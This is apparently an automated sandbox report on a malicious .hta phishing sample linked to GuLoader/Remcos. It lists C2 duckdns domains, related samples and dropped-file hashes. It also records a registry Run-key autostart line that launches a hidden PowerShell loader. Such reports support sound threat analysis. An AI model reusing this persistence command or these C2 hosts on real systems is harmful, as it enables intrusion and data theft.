45.88.90.110 | jgbours284hawara02.duckdns.org | Bulgaria | 10753 | LVLT-10753US | true
239.255.255.250 | unknown | Reserved | unknown | unknown | false
87.121.105.163 | unknown | Bulgaria | 43561 | NET1-ASBG | false
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
192.169.69.26 | jgbours284hawara01.duckdns.org | United States | 23033 | WOWUS | true
                                                                              IP
                                                                              192.168.2.5
                                                                              127.0.0.1
                                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                                              Analysis ID:1435041
                                                                              Start date and time:2024-05-02 01:13:17 +02:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 7m 54s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:23
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta
                                                                              renamed because original name is a hash value
                                                                              Original Sample Name:PLOCMR-002 Dane dotyczce dokumentw i towarw.hta
                                                                              Detection:MAL
                                                                              Classification:mal100.phis.troj.spyw.evad.winHTA@46/25@7/8
                                                                              EGA Information:
                                                                              • Successful, ratio: 80%
                                                                              HCA Information:
                                                                              • Successful, ratio: 99%
                                                                              • Number of executed functions: 165
                                                                              • Number of non-executed functions: 329
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .hta
                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                              • Excluded IPs from analysis (whitelisted): 23.51.58.94, 142.250.65.227, 142.250.65.206, 172.253.115.84, 34.104.35.123, 23.44.201.207, 23.44.201.211, 192.229.211.108, 142.251.40.163, 142.250.65.174
                                                                              • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, e16604.g.akamaiedge.net, update.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net
                                                                              • Execution Graph export aborted for target powershell.exe, PID 3748 because it is empty
                                                                              • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed, report is missing behavior information
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                              • VT rate limit hit for: PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta
Time | Type | Description
01:14:03 | API Interceptor | 2x Sleep call for process: svchost.exe modified
01:14:03 | API Interceptor | 89x Sleep call for process: powershell.exe modified
01:14:57 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Straddlers %Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)
01:15:05 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Straddlers %Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)
01:15:36 | API Interceptor | 159x Sleep call for process: wab.exe modified
                                                                                                              x1b5bmJgLm.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 153.13.37.94
                                                                                                              fbW42zYly3.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 206.165.107.221
                                                                                                              NBcTP7MyXM.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                              • 45.88.90.17
                                                                                                              SBZG0flucJ.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                              • 45.88.90.17
                                                                                                              Sl8HmMfNnr.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                              • 45.88.90.17
                                                                                                              50eBWGCFKc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                              • 45.88.90.17
                                                                                                              BOVjnkqU4W.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                              • 45.88.90.17
                                                                                                              WOWUSdocumento.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                              • 192.169.69.26
                                                                                                              LUMEN3547583853959599359959359Cercospora.batGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                              • 192.169.69.26
                                                                                                              https://pub-68c8c7ae0a9b4e62b5641da4fe04590d.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 192.169.69.26
                                                                                                              https://svuch3d.duckdns.org/Get hashmaliciousUnknownBrowse
                                                                                                              • 192.169.69.26
                                                                                                              https://6mw23o.duckdns.org/Get hashmaliciousUnknownBrowse
                                                                                                              • 192.169.69.26
                                                                                                              https://ixkv5pf.duckdns.org/Get hashmaliciousUnknownBrowse
                                                                                                              • 192.169.69.26
                                                                                                              87tBuE42ft.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                              • 172.93.222.219
                                                                                                              VbVGKkKgdbEScfW.scrGet hashmaliciousNanocore, PureLog StealerBrowse
                                                                                                              • 192.169.69.26
                                                                                                              dxM4ij1KkuoBK3H.scrGet hashmaliciousNanocoreBrowse
                                                                                                              • 192.169.69.26
                                                                                                              Q00D5u1xHq.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                              • 208.115.121.80
                                                                                                              ATOM86-ASATOM86NLhttps://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:c2e8c3b1-63be-4a97-a3b9-a21649a6fcffGet hashmaliciousRemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              bYPQHxUNMF.exeGet hashmaliciousRemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              doc.batGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              New Order.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              PO-TKT-RFQ#24_4_30.com.exeGet hashmaliciousRemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              AWBSHIPPING-DHL-46T6R9764987.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              1714456209369804801bdf0184bf91899d6952ac3158287761ba79e58bda9aa9358475c597235.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              1138de370e523e824bbca92d049a3777https://juclouds.com/Get hashmaliciousUnknownBrowse
                                                                                                              • 23.1.237.91
                                                                                                              file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                              • 23.1.237.91
                                                                                                              https://wywljs.com/Get hashmaliciousUnknownBrowse
                                                                                                              • 23.1.237.91
                                                                                                              https://www.soqsrkk.cn/Get hashmaliciousUnknownBrowse
                                                                                                              • 23.1.237.91
                                                                                                              Transmitted.jarGet hashmaliciousDynamic StealerBrowse
                                                                                                              • 23.1.237.91
                                                                                                              https://us-tommybahama.shop/collections/men-shirts/products/barbados-breeze-beach-bloom-stretch-linen-shirt?data_from=collection_detail%20us-tommybahama.shopGet hashmaliciousUnknownBrowse
                                                                                                              • 23.1.237.91
                                                                                                              tZvjMg3Hw9.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                                                                                                              • 23.1.237.91
                                                                                                              mbROg6u6if.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 23.1.237.91
                                                                                                              https://github.com/ytisf/theZoo/blob/master/malware/Binaries/Artemis/Artemis.sha256Get hashmaliciousUnknownBrowse
                                                                                                              • 23.1.237.91
                                                                                                              cZOa7Yhm9e.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 23.1.237.91
                                                                                                              28a2c9bd18a11de089ef85a160da29e4undelivered Messages.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 20.12.23.50
                                                                                                              https://smithlakervresort.com/Get hashmaliciousUnknownBrowse
                                                                                                              • 20.12.23.50
                                                                                                              file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                              • 20.12.23.50
                                                                                                              https://www.jmwbpns.cn/Get hashmaliciousUnknownBrowse
                                                                                                              • 20.12.23.50
                                                                                                              https://www.uhnrya.cn/Get hashmaliciousUnknownBrowse
                                                                                                              • 20.12.23.50
                                                                                                              https://cybershieldfortress.buzz/avs/en/dt/mca-4-no5.php?Get hashmaliciousUnknownBrowse
                                                                                                              • 20.12.23.50
                                                                                                              Benefits.docxGet hashmaliciousUnknownBrowse
                                                                                                              • 20.12.23.50
                                                                                                              https://wywljs.com/Get hashmaliciousUnknownBrowse
                                                                                                              • 20.12.23.50
                                                                                                              https://xdywna.com/Get hashmaliciousUnknownBrowse
                                                                                                              • 20.12.23.50
                                                                                                              https://portal.cpscompressors.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                              • 20.12.23.50
                                                                                                              No context
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1310720
                                                                                                              Entropy (8bit):0.8512803232926602
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDug/:gJjJGtpTq2yv1AuNZRY3diu8iBVqF6
                                                                                                              MD5:0E504186EFB11EE97CFBCF0F17FD51FD
                                                                                                              SHA1:E62C43AE495ADF7DB458B24A8F5D2DAD16FCCD7B
                                                                                                              SHA-256:F6B251FF72AFBC3601B3FAFE8F3FB0551A633087BE4766A95C9DE2DF1029E83A
                                                                                                              SHA-512:13BCE4CE01C3D061C584550A52BEBED920B53CD5C3C6D8CEA745DA2AC250FF94BD59A62562C6FB90FF9C57EBDFA9102E60159F3CEAC96AAC8EE0134DDE05B69E
                                                                                                              Malicious:false
Preview: binary data; readable strings: C:\ProgramData\Microsoft\Network\Downloader\ and C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x4e16ba81, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1310720
                                                                                                              Entropy (8bit):0.6585794120446483
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:ZSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:Zaza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                              MD5:A3C83519CABDD3EB4C183CF6869A68AA
                                                                                                              SHA1:F192BE25916AC087A58B3C4365406E9A0AE5CE56
                                                                                                              SHA-256:B8AF947E0B43F34FEC0359F9E76865E2BD392A5BD25BED6FADBF8CAEBDFD28EB
                                                                                                              SHA-512:C9BA0CEF6880D595EDA510F9CA04205560C25A62994175291D9BCE85C768CF3AE61C1805772DD761E2AD3B9BD349E5146767168C81C5D38F7341C73158BD9EB9
                                                                                                              Malicious:false
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):16384
                                                                                                              Entropy (8bit):0.08096041285605929
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:pg/ltKYeRm3qfVGuAJkhvekl1Aa+HallrekGltll/SPj:8XKzR42rxlaMJe3l
                                                                                                              MD5:8F8C18168585BD3BAF4C0C31E20736F0
                                                                                                              SHA1:328B3558FDEED19B2F354A1A878CD80252B953EB
                                                                                                              SHA-256:EE06EAB3C7563B77E8A48E1562950C9ADB68EA88B342C34546DBF528A76F9EF0
                                                                                                              SHA-512:EED3F920A1177F328085364AA99AA45900557F4A2673C8A999C894C96021FA34C4D3FA3FCF1D309C4B150699B054CA17859CB1B50A613C14C5CC8B7813DC326E
                                                                                                              Malicious:false
                                                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                              File Type:JSON data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):965
                                                                                                              Entropy (8bit):5.02359004946268
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:tkhXkmnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qhXldVauKyGX85jvXhNlT3/7AcV9Wro
                                                                                                              MD5:A82488501536043ACF922C4D91246D09
                                                                                                              SHA1:BCA9EF44B47567D62A94F2ED6A79491575544D06
                                                                                                              SHA-256:47F1D58A3F31240D1EAE84F8585B4AFFA9ECE1EDF5FFB39631431954E1B39D5E
                                                                                                              SHA-512:30F80522E14B7AC59FB4D260D8C36A3FB88CCF29B7E279F34A493F94B59CF1EC0951205E33A1E81631AD8C682CF8831BC185E224A43A87BB52CB0C0D7080DB50
                                                                                                              Malicious:false
                                                                                                              Preview:{. "geoplugin_request":"191.96.150.225",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8003
                                                                                                              Entropy (8bit):4.838950934453595
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
                                                                                                              MD5:4C24412D4F060F4632C0BD68CC9ECB54
                                                                                                              SHA1:3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
                                                                                                              SHA-256:411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
                                                                                                              SHA-512:6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
                                                                                                              Malicious:false
                                                                                                              Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1436
                                                                                                              Entropy (8bit):5.439833314128707
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:3jFytiWSKco4KmZjKbmOIKod6emN1s4RPQoU99t7J0gt/NK3R8oHiag89MOcT4:zFysWSU4xympjms4RIoU99tK8NWR8oHP
                                                                                                              MD5:95E37424D262A861DAADC34F09A879A9
                                                                                                              SHA1:91ABA95EAE0547FE0913BAD131F25C9EC0DCD37A
                                                                                                              SHA-256:EC60AA96122C6068B5BED79215F996670335AABC9A97FD6DFCF5FED8EA43E8CD
                                                                                                              SHA-512:FBFE8A1EA6DEFA37440A9E9FA4024347DAA5F2CA524CC395A5F499CEB8DC1A0F08A6560F9F02D4CEEE22031A78BB523A09F2361B7D41A7136F6B755FE213182E
                                                                                                              Malicious:false
                                                                                                              Preview:@...e...........%.....................^..............@..........P................1]...E.....%.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb20b6b62, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                              Category:dropped
                                                                                                              Size (bytes):15728640
                                                                                                              Entropy (8bit):0.10106922760070924
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:WSB2jpSB2jFSjlK/yw/ZweshzbOlqVqLesThEjv7veszO/Zk0P1EX:Wa6akUueqaeP6W
                                                                                                              MD5:8474A17101F6B908E85D4EF5495DEF3C
                                                                                                              SHA1:7B9993C39B3879C85BF4F343E907B9EBBDB8D30F
                                                                                                              SHA-256:56CC6547BDF75FA8CA4AF11433A7CAE673C8D1DF0DE51DBEEB19EF3B1D844A2A
                                                                                                              SHA-512:056D7FBFB21BFE87642D57275DD07DFD0DAE21D53A7CA7D748D4E89F199B3C212B4D6F5C4923BE156528556516AA8B4D44C6FC4D5287268C6AD5657FE5FEC7A0
                                                                                                              Malicious:false
                                                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                              Category:dropped
                                                                                                              Size (bytes):106496
                                                                                                              Entropy (8bit):1.136413900497188
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                              Malicious:false
                                                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                              Category:dropped
                                                                                                              Size (bytes):40960
                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                              Malicious:false
                                                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2
                                                                                                              Entropy (8bit):1.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Qn:Qn
                                                                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                              Malicious:false
                                                                                                              Preview:..
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):470316
                                                                                                              Entropy (8bit):5.964943754056069
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6144:pmWRO/EskZW8lAYGWVgCESycHeZqPQ3Sq9+7jY5Z0TOkAqS2rLue0x5s/o/:pmWe6ZBStEgCEIHeZq43BcjgNj2rm+/Y
                                                                                                              MD5:927282768278628276ABF0C79AE9413D
                                                                                                              SHA1:9F6CB01AE056C0B0501385D94A6ADF22A52DBD2C
                                                                                                              SHA-256:0FB7017C171F4C64674898F94258C4F8CB4C63064FE12A34FD78F174F4C4CC01
                                                                                                              SHA-512:985BA4499A473D3AA247B5EAA73C9ED8140D3E19333489C71E2E69BACB38C32B8D6B2EC98255348A98F1216BCC9EA5FF3C523EA65FA1AF23CB154D7BFC45934A
                                                                                                              Malicious:false
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed May 1 22:14:22 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2677
                                                                                                              Entropy (8bit):3.982935300013458
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:8S1dssT59WEHlidAKZdA19ehwiZUklqehHy+3:8SksvWeoy
                                                                                                              MD5:C68E4A217430CC9BA9BC30F99BBC457B
                                                                                                              SHA1:42A6610313B02C5C097B2ADEFFA837B67AC5979E
                                                                                                              SHA-256:D52218B791AE73B51E0D99DC5BDCDA02F55B3AC55618F5A54B3F3D516F19CE4D
                                                                                                              SHA-512:A790D2579139F1B3DDB96B041AC6DEC62B2771FB6EE24137DA04352008609112F5CC7B1DAB8BE11DAA22980BC7CF0ABB5F6BBE5260E2C927CD9D14EE870A87E5
                                                                                                              Malicious:false
                                                                                                              Preview:L..................F.@.. ...$+.,......3M....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........T........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed May 1 22:14:22 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2679
                                                                                                              Entropy (8bit):3.9996103113047985
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:8pdssT59WEHlidAKZdA1weh/iZUkAQkqehYy+2:8QsvW89QBy
                                                                                                              MD5:7AEBB1F090C3F7387DFACCC66A6232C1
                                                                                                              SHA1:02434052FD37E265844381F20F7DAF637CDEF917
                                                                                                              SHA-256:8FFA5834016BBA884A70000AA06C7F091C6B2634EAC1117DE5B9ED7350F9EBE7
                                                                                                              SHA-512:9546DCC5CFA929F78781B414CD3EDCFB11012156BD92951F6166DAE2F300FF90A56B4978F9FF58A36E3C7CDB373F070A22BC1BF8C6005031EE39FDB2AD6C5CE4
                                                                                                              Malicious:false
                                                                                                              Preview:L..................F.@.. ...$+.,....|y(M....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........T........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2693
                                                                                                              Entropy (8bit):4.009811390615862
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:8xWdssT59sHlidAKZdA14tseh7sFiZUkmgqeh7sqy+BX:8xbsvcn0y
                                                                                                              MD5:B7F947810626FE6FB8FC15C54370D377
